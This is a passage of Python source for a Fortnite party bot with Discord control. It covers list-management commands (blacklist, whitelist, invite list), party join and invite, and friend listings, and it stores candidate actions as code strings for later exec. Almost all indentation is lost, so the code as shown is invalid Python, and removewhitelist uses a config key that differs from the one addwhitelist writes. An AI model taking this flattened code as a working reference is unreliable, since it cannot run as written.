await asyncio.gather(*[_(pending) for pending in client.incoming_pending_friends])
except Exception:
data["discord"]["enabled"] = False
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if data['discord']['enabled'] and dclient.isready:
dclient_user = name(dclient.user)
dclient.owner = []
for owner in data['discord']['owner']:
user = dclient.get_user(owner)
if not user:
try:
user = await dclient.fetch_user(owner)
except discord.NotFound:
if data['loglevel'] == "debug":
send(dclient_user,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
except discord.HTTPException:
if data['loglevel'] == 'debug':
send(dclient_user,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(dclient_user,l('error_while_requesting_userinfo'),red,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}',add_d=lambda x:f'>>> {x}')
if not user:
send(dclient_user,l('discord_owner_notfound',owner),red,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}',add_d=lambda x:f'>>> {x}')
else:
dclient.owner.append(user)
send(dclient_user,f"{l('owner')}: {name(user)}",green,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}')
lists = {
"blacklist_": "blacklist",
"whitelist_": "whitelist"
}
async def _(listuser: str) -> None:
listuser = int(listuser)
user = dclient.get_user(listuser)
if not user:
try:
user = await dclient.fetch_user(listuser)
except discord.NotFound:
if data['loglevel'] == "debug":
send(dclient_user,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(dclient_user,l(f'discord_{data_}_user_notfound', listuser),red,add_p=lambda x:f'[{now()}] [{dclient_user}] {x}',add_d=lambda x:f'>>> {x}')
return
globals()[list_].append(user.id)
for list_,data_ in lists.items():
await asyncio.gather(*[_(listuser) for listuser in data['discord'][data_]])
if data['loglevel'] == "debug":
send(dclient_user,f"discord {data_}list {globals()[list_]}",yellow,add_d=lambda x:f'```\n{x}\n```')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
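# When a name search matches several users, the candidates are parked in
# client.select[author.id] as pairs of exec-able snippets plus per-user
# variables; the author is then expected to pick one by number (the selection
# handler itself lives elsewhere in this file).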
elif args[0] in commands['addblacklist']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['addblacklist']}] [{l('name_or_id')}]")
return
if data["caseinsensitive"]:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and user.id not in blacklist}
else:
    users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and user.id not in blacklist}
try:
user = await client.fetch_user(rawcontent)
if user:
if user.id not in blacklist:
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', len(users)))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if user.id not in blacklist:
blacklist.append(user.id)
if user.display_name:
data["fortnite"]["blacklist"].append(user.display_name)
else:
data["fortnite"]["blacklist"].append(user.id)
data_ = load_json("config.json")
data_["fortnite"]["blacklist"] = data["fortnite"]["blacklist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l('add_to_list', f'{name(user)}', l('blacklist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('add_to_list', f'{name(user)}', l('blacklist')))
else:
await reply(message, client, l('already_list', f'{name(user)}', l('blacklist')))
else:
client.select[message.author.id] = {
"exec": [
"""\
if user.id not in blacklist:
blacklist.append(user.id)
if user.display_name:
data["fortnite"]["blacklist"].append(user.display_name)
else:
data["fortnite"]["blacklist"].append(user.id)
data_ = load_json("config.json")
data_["fortnite"]["blacklist"] = data["fortnite"]["blacklist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l('add_to_list', f'{name(user)}', l('blacklist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('add_to_list', f'{name(user)}', l('blacklist')))
else:
await reply(message, client, l('already_list', f'{name(user)}', l('blacklist')))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_add_to_list', l('blacklist'))}"
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['removeblacklist']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['removeblacklist']}] [{l('name_or_id')}]")
return
if data["caseinsensitive"]:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and user.id in blacklist}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and user.id in blacklist}
try:
user = await client.fetch_user(rawcontent)
if user:
if user.id in blacklist:
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if user.id in blacklist:
blacklist.remove(user.id)
try:
data["fortnite"]["blacklist"].remove(str(user.display_name))
except ValueError:
data["fortnite"]["blacklist"].remove(user.id)
data_ = load_json("config.json")
data_["fortnite"]["blacklist"] = data["fortnite"]["blacklist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l('remove_from_list', name(user), l('blacklist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('remove_from_list', name(user), l('blacklist')))
else:
await reply(message, client, l('not_list', name(user), l('blacklist')))
else:
client.select[message.author.id] = {
"exec": [
"""\
if user.id in blacklist:
blacklist.remove(user.id)
try:
data["fortnite"]["blacklist"].remove(str(user.display_name))
except ValueError:
data["fortnite"]["blacklist"].remove(user.id)
data_ = load_json("config.json")
data_["fortnite"]["blacklist"] = data["fortnite"]["blacklist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l('remove_from_list', name(user), l('blacklist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('remove_from_list', name(user), l('blacklist')))
else:
await reply(message, client, l('not_list', name(user), l('blacklist')))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_remove_from_list', l('blacklist'))}"
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['addwhitelist']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['addwhitelist']}] [{l('name_or_id')}]")
return
if data["caseinsensitive"]:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and user.id not in whitelist}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and user.id not in whitelist}
try:
user = await client.fetch_user(rawcontent)
if user:
if user.id not in whitelist:
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if user.id not in whitelist:
whitelist.append(user.id)
if user.display_name:
data["fortnite"]["whitelist"].append(str(user.display_name))
else:
data["fortnite"]["whitelist"].append(user.id)
data_ = load_json("config.json")
data_["fortnite"]["whitelist"] = data["fortnite"]["whitelist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l("add_to_list",name(user),l('whitelist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l("add_to_list", name(user), l('whitelist')))
else:
await reply(message, client, l("already_list", name(user), l('whitelist')))
else:
client.select[message.author.id] = {
"exec": [
"""\
if user.id not in whitelist:
whitelist.append(user.id)
if user.display_name:
data["fortnite"]["whitelist"].append(str(user.display_name))
else:
data["fortnite"]["whitelist"].append(user.id)
data_ = load_json("config.json")
data_["fortnite"]["whitelist"] = data["fortnite"]["whitelist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l("add_to_list",name(user),l('whitelist')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l("add_to_list", name(user), l('whitelist')))
else:
await reply(message, client, l("already_list", name(user), l('whitelist')))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_add_to_list', l('whitelist'))}"
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
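# removewhitelist: mirror of addwhitelist; drops the user from the whitelist and
# rewrites config.json.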
elif args[0] in commands['removewhitelist']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['removewhitelist']}] [{l('name_or_id')}]")
return
if data["caseinsensitive"]:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and user.id in whitelist}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and user.id in whitelist}
try:
user = await client.fetch_user(rawcontent)
if user:
if user.id in whitelist:
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(l("bot"),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l("too_many_users", str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if user.id in whitelist:
whitelist.remove(user.id)
try:
data["whitelist"].remove(str(user.display_name))
except ValueError:
data["whitelist"].remove(user.id)
data_ = load_json("config.json")
data_["whitelist"] = data["whitelist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l("remove_from_list",name(user),l("whitelist")),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l("remove_from_list", name(user), l('whitelist')))
else:
await reply(message, client, l("not_list", name(user), l('whitelist')))
else:
client.select[message.author.id] = {
"exec": [
"""\
if user.id in whitelist:
whitelist.remove(user.id)
try:
data["whitelist"].remove(str(user.display_name))
except ValueError:
data["whitelist"].remove(user.id)
data_ = load_json("config.json")
data_["whitelist"] = data["whitelist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l("remove_from_list",name(user),l("whitelist")),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l("remove_from_list", name(user), l('whitelist')))
else:
await reply(message, client, l("not_list", name(user), l('whitelist')))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_remove_from_list', l('whitelist'))}"
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
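# addinvitelist: add a user to this client's invite list (used by the inviteall command)
# and persist it to config.json.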
elif args[0] in commands['addinvitelist']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['addinvitelist']}] [{l('name_or_id')}]")
return
if data["caseinsensitive"]:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and user.id not in client.invitelist}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and user.id not in client.invitelist}
try:
user = await client.fetch_user(rawcontent)
if user:
if user.id not in client.invitelist:
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l("too_many_users", str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if user.id not in client.invitelist:
client.invitelist.append(user.id)
if user.display_name:
data["fortnite"]["invitelist"].append(str(user.display_name))
else:
data["fortnite"]["invitelist"].append(user.id)
data_ = load_json("config.json")
data_["fortnite"]["invitelist"] = data["fortnite"]["invitelist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l("add_to_list",name(user),l("invitelist")),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l("add_to_list", name(user), l('invitelist')))
else:
await reply(message, client, l("already_list", name(user), l('invitelist')))
else:
client.select[message.author.id] = {
"exec": [
"""\
if user.id not in client.invitelist:
client.invitelist.append(user.id)
if user.display_name:
data["fortnite"]["invitelist"].append(str(user.display_name))
else:
data["fortnite"]["invitelist"].append(user.id)
data_ = load_json("config.json")
data_["fortnite"]["invitelist"] = data["fortnite"]["invitelist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l("add_to_list",name(user),l("invitelist")),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l("add_to_list", name(user), l('invitelist')))
else:
await reply(message, client, l("already_list", name(user), l('invitelist')))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_add_to_list', l('invitelist'))}"
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
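# removeinvitelist: remove a user from this client's invite list and persist config.json.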
elif args[0] in commands['removeinvitelist']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['removeinvitelist']}] [{l('name_or_id')}]")
return
if data["caseinsensitive"]:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and user.id in client.invitelist}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and user.id in client.invitelist}
try:
user = await client.fetch_user(rawcontent)
if user:
if user.id in client.invitelist:
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l("too_many_users", str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if user.id in client.invitelist:
client.invitelist.remove(user.id)
try:
data["fortnite"]["invitelist"].remove(str(user.display_name))
except ValueError:
data["fortnite"]["invitelist"].remove(user.id)
data_ = load_json("config.json")
data_["fortnite"]["invitelist"] = data["fortnite"]["invitelist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l("remove_from_list",name(user),l("invitelist")),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l("remove_from_list", name(user), l('invitelist')))
else:
await reply(message, client, l("not_list", name(user), l('invitelist')))
else:
client.select[message.author.id] = {
"exec": [
"""\
if user.id in client.invitelist:
client.invitelist.remove(user.id)
try:
data["fortnite"]["invitelist"].remove(str(user.display_name))
except ValueError:
data["fortnite"]["invitelist"].remove(user.id)
data_ = load_json("config.json")
data_["fortnite"]["invitelist"] = data["fortnite"]["invitelist"]
with open("config.json", "w", encoding="utf-8") as f:
json.dump(data_, f, ensure_ascii=False, indent=4, sort_keys=False)
send(display_name,l("remove_from_list",name(user),l("invitelist")),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l("remove_from_list", name(user), l('invitelist')))
else:
await reply(message, client, l("not_list", name(user), l('invitelist')))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_remove_from_list', l('invitelist'))}"
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
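# get: print a party member's current loadout (outfit, backpack, pickaxe, emote and
# their variants); dumps the full member meta schema when loglevel is 'debug'.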
elif args[0] in commands['get']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['get']}] [{l('name_or_id')}]")
return
if data["caseinsensitive"]:
users = {str(member.display_name): member for member in client.party.members if content_ in jaconv.kata2hira(str(member.display_name).lower())}
else:
users = {str(member.display_name): member for member in client.party.members if content_ in str(member.display_name)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.party.get_member(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l("too_many_users", str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l("user_not_in_party"))
return
send(display_name,f'{name(member)}\n{member.outfit} {member.outfit_variants}\n{partymember_backpack(member)} {member.backpack_variants}\n{member.pickaxe} {member.pickaxe_variants}\n{partymember_emote(member)}',add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
if data['loglevel'] == 'debug':
send(display_name,json.dumps(member.meta.schema, indent=2),yellow,add_d=lambda x:f'```\n{x}\n```',add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, f'{name(member)}\n{member.outfit} {member.outfit_variants}\n{partymember_backpack(member)} {member.backpack_variants}\n{member.pickaxe} {member.pickaxe_variants}\n{partymember_emote(member)}')
else:
client.select[message.author.id] = {
"exec": [
"""\
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l("user_not_in_party"))
return
send(display_name,f'{name(member)}\n{member.outfit} {member.outfit_variants}\n{partymember_backpack(member)} {member.backpack_variants}\n{member.pickaxe} {member.pickaxe_variants}\n{partymember_emote(member)}',add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
if data['loglevel'] == 'debug':
send(display_name,json.dumps(member.meta.schema, indent=2),yellow,add_d=lambda x:f'>>> {x}',add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, f'{name(member)}\n{member.outfit} {member.outfit_variants}\n{partymember_backpack(member)} {member.backpack_variants}\n{member.pickaxe} {member.pickaxe_variants}\n{partymember_emote(member)}')""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_get_userinfo')}"
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
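# Read-only counters and listings: friend/pending/block counts and the corresponding lists.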
elif args[0] in commands['friendcount']:
try:
send(display_name,f"{l('friendcount')}: {len(client.friends)}",add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, f"{l('friendcount')}: {len(client.friends)}")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['pendingcount']:
try:
send(display_name,f"{l('pendingcount')}: {len(client.pending_friends)}\n{l('outbound')}: {len(client.outgoing_pending_friends)}\n{l('inbound')}: {len(client.incoming_pending_friends)}",add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, f"{l('pendingcount')}: {len(client.pending_friends)}\n{l('outbound')}: {len(client.outgoing_pending_friends)}\n{l('inbound')}: {len(client.incoming_pending_friends)}")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['blockcount']:
try:
send(display_name,f"{l('blockcount')}: {len(client.blocked_users)}",add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, f"{l('blockcount')}: {len(client.blocked_users)}")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['friendlist']:
try:
text = ''
for friend in client.friends:
client.add_cache(friend)
text += f'\n{name(friend)}'
send(display_name,text,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, f'{text}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['pendinglist']:
try:
outgoing = ''
incoming = ''
for pending in client.pending_friends:
client.add_cache(pending)
if pending.outgoing:
outgoing += f'\n{name(pending)}'
elif pending.incoming:
incoming += f'\n{name(pending)}'
send(display_name,f"{l('outbound')}: {outgoing}\n{l('inbound')}: {incoming}",add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, f"{l('outbound')}: {outgoing}\n{l('inbound')}: {incoming}")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['blocklist']:
try:
text = ''
for block in client.blocked_users:
client.add_cache(block)
text += f'\n{name(block)}'
send(display_name,text,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, f'{text}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
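# wait: temporarily decline party invites; a Timer (presumably threading.Timer) restores
# acceptance after data['fortnite']['waitinterval'] seconds. While invites are already
# being declined, only owners/whitelisted users may re-arm the timer.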
elif args[0] in commands['wait']:
try:
if not client.acceptinvite:
if isinstance(message, fortnitepy.message.MessageBase) or isinstance(getattr(message,"base",None), fortnitepy.message.MessageBase):
if (not (message.author.id in [owner.id for owner in client.owner])
and not (message.author.id in whitelist and data['fortnite']['whitelist-ownercommand'])
and not (message.author.id in [owner.id for owner in dclient.owner])
and not (message.author.id in whitelist_ and data['discord']['whitelist-ownercommand'])):
await reply(message, client, l('invite_is_decline'))
return
client.acceptinvite = False
try:
client.timer_.cancel()
except AttributeError:
pass
client.timer_ = Timer(data['fortnite']['waitinterval'], client.inviteaccept)
client.timer_.start()
await reply(message, client, l('decline_invite_for', str(data['fortnite']['waitinterval'])))
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
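# join: join a friend's party, resolving the target the same way as the list commands;
# party-related exceptions are translated into localized replies.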
elif args[0] in commands['join']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['join']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.has_friend(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.has_friend(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.has_friend(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
friend = client.get_friend(user.id)
if not friend:
await reply(message, client, l('not_friend_with_user'))
else:
await friend.join_party()
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
friend = client.get_friend(user.id)
if not friend:
await reply(message, client, l('not_friend_with_user'))
else:
await friend.join_party()
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_full_or_already_or_offline'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_notfound'))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_private'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_joining_to_party'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"{l('enter_to_join_party')}"
await reply(message, client, text)
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_full_or_already_or_offline'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_notfound'))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_private'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_joining_to_party'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
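# joinid: join a party directly by its party ID (args[1]).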
elif args[0] in commands['joinid']:
try:
await client.join_party(party_id=args[1])
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_full_or_already'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_notfound'))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_private'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['join']}] [{l('party_id')}]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['leave']:
try:
await client.party.me.leave()
await reply(message, client, l('party_leave', client.party.id))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_leaving_party'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
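# invite: invite a friend to the current party.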
elif args[0] in commands['invite']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['invite']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.has_friend(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.has_friend(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.has_friend(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
friend = client.get_friend(user.id)
if not friend:
await reply(message, client, l('not_friend_with_user'))
return
await friend.invite()
await reply(message, client, l('user_invited', name(friend), client.party.id))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
friend = client.get_friend(user.id)
if not friend:
await reply(message, client, l('not_friend_with_user'))
return
await friend.invite()
await reply(message, client, l('user_invited', name(friend), client.party.id))
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('party_full_or_already'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
